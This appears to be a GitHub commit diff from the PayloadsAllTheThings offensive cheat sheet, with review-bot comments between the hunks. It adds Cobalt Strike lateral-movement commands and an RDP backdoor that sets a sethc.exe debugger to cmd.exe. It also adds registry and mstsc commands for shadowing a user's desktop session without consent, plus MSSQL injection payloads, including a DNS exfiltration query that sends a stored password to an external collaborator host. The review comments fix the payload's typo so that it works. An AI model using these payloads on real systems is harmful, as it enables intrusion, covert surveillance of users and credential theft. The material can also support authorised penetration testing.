mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Remote Desktop Services Shadowing
This commit is contained in:
parent 4fe1d71ad8
commit 1137bfca8d
3 changed files with 54 additions and 3 deletions
@ -313,6 +313,19 @@ beacon > execute-assembly /home/audit/Rubeus.exe

## Lateral Movement

- **portscan:** Performs a portscan on a spesific target.
- **runas:** A wrapper of runas.exe, using credentials you can run a command as another user.
- **pth:** By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \
:exclamation: This module needs Administrator privileges.
- **steal_token:** Steal a token from a specified process.
- **make_token:** By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user.
- **jump:** Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. \
:exclamation: The **jump** module will use the current delegation/impersonation token to authenticate on the remote target. \
:muscle: We can combine the **jump** module with the **make_token** or **pth** module for a quick "jump" to another target on the network.
- **remote-exec:** Execute a command on a remote target using psexec, winrm or wmi. \
:exclamation: The **remote-exec** module will use the current delegation/impersonation token to authenticate on the remote target.
- **ssh/ssh-key:** Authenticate using ssh with password or private key. Works for both linux and windows hosts.

:warning: All the commands launch powershell.exe

```powershell
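Review bot: two spelling errors in the new bullets: "spesific" in the **portscan** entry should read "specific", and "lateraly" in the **jump** entry should read "laterally". The trailing ` \` used to force a line break is applied inconsistently (the **make_token** and **ssh/ssh-key** entries have none while the **pth**, **jump** and **remote-exec** entries do); since the `:exclamation:` and `:muscle:` notes are meant to sit under their parent bullet, indenting them as sub-items would render the same hierarchy without relying on hard line breaks.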
@ -25,6 +25,7 @@
* [RDP Backdoor](#rdp-backdoor)
* [utilman.exe](#utilman.exe)
* [sethc.exe](#sethc.exe)
* [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
* [Skeleton Key](#skeleton-key)
* [References](#references)

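Review bot: the new entry's anchor `#remote-desktop-services-shadowing` matches the slug GitHub generates for the `### Remote Desktop Services Shadowing` heading added in this commit, so the link resolves. The two neighbouring context entries `#utilman.exe` and `#sethc.exe` do not: GitHub drops punctuation when building heading ids, so the targets are `#utilmanexe` and `#sethcexe`. Pre-existing, but worth fixing while this table of contents is being touched.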
@ -314,6 +315,31 @@ Hit F5 a bunch of times when you are at the RDP login screen.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
```

### Remote Desktop Services Shadowing

:warning: FreeRDP and rdesktop don't support Remote Desktop Services Shadowing feature.

Requirements:
* RDP must be running

```powershell
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 4
# 4 – View Session without user’s permission.

# Allowing remote connections to this computer
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


# Disable UAC remote restriction
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

mstsc /v:{ADDRESS} /shadow:{SESSION_ID} /noconsentprompt /prompt
# /v parameter lets specify the {ADDRESS} value that is an IP address or a hostname of a remote host;
# /shadow parameter is used to specify the {SESSION_ID} value that is a shadowee’s session ID;
# /noconsentprompt parameter allows to bypass a shadowee’s permission and shadow their session without their consent;
# /prompt parameter is used to specify a user’s credentials to connect to a remote host.
```

### Skeleton Key

```powershell
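Review bot: the first `reg add` (the `Shadow` policy value) is missing the `/f` that the `fDenyTSConnections` and `LocalAccountTokenFilterPolicy` lines carry, so if the value already exists `reg` stops on an interactive "overwrite (Yes/No)?" prompt and hangs a non-interactive shell; add `/f` for consistency. The `# 4 – View Session without user’s permission.` comment explains only the value chosen; naming the setting as the "Set rules for remote control of Remote Desktop Services user sessions" policy, which this key mirrors, would tell the reader where a defender sees it in Group Policy and why changes to it are worth auditing. Minor: the block is fenced as `powershell` but contains plain `reg`/`mstsc` invocations that run unchanged from cmd.exe, so `cmd` or `batch` would be the more accurate tag, matching the `REG ADD` block above it.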
@ -15,7 +15,9 @@
* [MSSQL Time Based](#mssql-time-based)
* [MSSQL Stacked query](#mssql-stacked-query)
* [MSSQL Command execution](#mssql-command-execution)
* [MSSQL UNC path](#mssql-unc-path)
* [MSSQL Out of band](#mssql-out-of-band)
* [MSSQL DNS exfiltration](#mssql-dns-exfiltration)
* [MSSQL UNC path](#mssql-unc-path)
* [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
* [MSSQL Trusted Links](#mssql-trusted-links)

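Review bot: the rendered hunk shows `* [MSSQL UNC path](#mssql-unc-path)` twice; given the line counts (+2 net) one of them is the removed original position, so confirm that the committed file keeps a single entry. Also, the body change in this same commit turns `MSSQL DNS exfiltration` and `MSSQL UNC Path` into `###` subsections of `## MSSQL Out of band`, while this table of contents lists all three at the same level; indenting the two sub-entries under `MSSQL Out of band` would mirror the heading structure.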
@ -134,7 +136,7 @@ ProductID=1';waitfor delay '0:0:10'--
ProductID=1');waitfor delay '0:0:10'--
ProductID=1));waitfor delay '0:0:10'--

IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --
```

## MSSQL Stacked Query

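Review bot: the removed and added `IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' comment: --` lines are indistinguishable in the rendered view (the hunk is -1/+1 with no visible text difference), so this is presumably a whitespace or invisible-character fix; the commit message "Remote Desktop Services Shadowing" does not mention it, so a short note in the message or a separate commit would make the change reviewable. While here, `comment: --` reads like a template placeholder rather than valid T-SQL; if the intent is "end with a comment", writing the line as the literal payload with the `--` terminator, as the `waitfor delay` examples above it do, would be clearer.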
@ -187,8 +189,18 @@ print(sys.version)
GO
```

## MSSQL Out of band

## MSSQL UNC Path
### MSSQL DNS exfiltration

Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1

```powershell
1 and exists(select * from fn_trace_gettable('\\'%2b(select pass frop users where id=1)%2b'.xxxxxxx.burpcollaborator.net\1.trc',default))
```


### MSSQL UNC Path

MSSQL supports stacked queries so we can create a variable pointing to our IP address then use the `xp_dirtree` function to list the files in our SMB share and grab the NTLMv2 hash.

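Review bot: the added `fn_trace_gettable` payload contains the typo `frop` in `select pass frop users where id=1`; as written the inner query is a syntax error and the example does not demonstrate the technique it is filed under, so it should read `from`. The fence is tagged `powershell` although the content is a URL-encoded SQL fragment (`%2b` for `+`); `sql` would be the accurate tag, and a one-line explanation that the UNC host name carries the query result so the lookup shows up in the collaborator's DNS logs would help the reader, since the section currently only links the source tweet. The `## MSSQL UNC Path` heading being demoted to `### MSSQL UNC Path` under the new `## MSSQL Out of band` is consistent with the table-of-contents change in this commit.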